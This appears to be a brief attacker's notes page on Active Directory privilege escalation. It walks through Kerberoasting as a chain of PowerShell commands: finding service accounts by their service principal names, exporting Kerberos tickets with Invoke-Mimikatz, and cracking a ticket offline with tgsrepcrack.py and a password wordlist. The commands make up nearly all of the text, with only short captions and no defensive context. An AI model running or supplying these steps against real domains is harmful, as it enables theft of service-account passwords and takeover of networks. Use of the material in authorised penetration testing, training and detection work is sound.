Powershell * POWERSHELL SECURITY

Domain Privesc

Find user accounts used as service accounts : PS C:\Users\victim.SECURITY\Downloads\ADModule-master\ADModule-master> Import-Module .\Microsoft.ActiveDirectory.Management.dll PS C:\Users\victim.SECURITY\Downloads\ADModule-master\ADModule-master\ActiveDirectory> Import-Module .\ActiveDirectory.psd1 PS C:\Users\victim.SECURITY\Downloads\ADModule-master\ADModule-master\ActiveDirectory> Get-ADUser -filter {serviceprincipalname -ne “$null”} -Properties serviceprincipalname Check if the TGS has been granted : PS C:\Users\victim.SECURITY\Downloads\ADModule-master\ADModule-master\ActiveDirectory> klist Export all ticket using mimitakz : PS C:\Users\victim.SECURITY\Downloads\PowerSploit-master\PowerSploit-master\Exfiltration> Invoke-Mimikatz -Command ‘”kerberos::list /export”‘ https://github.com/nidem/kerberoast/blob/master/tgsrepcrack.py PS C:\Users\victim.SECURITY\Downloads\kerberoast-master\kerberoast-master> python.exe .\tgsrepcrack.py .\10k-worst-passwords.txt .\2-40a50000-victim@ldap~WIN-2RUMVG5JPOC.security.local~security.local-SECURITY.LOCAL.kirbi…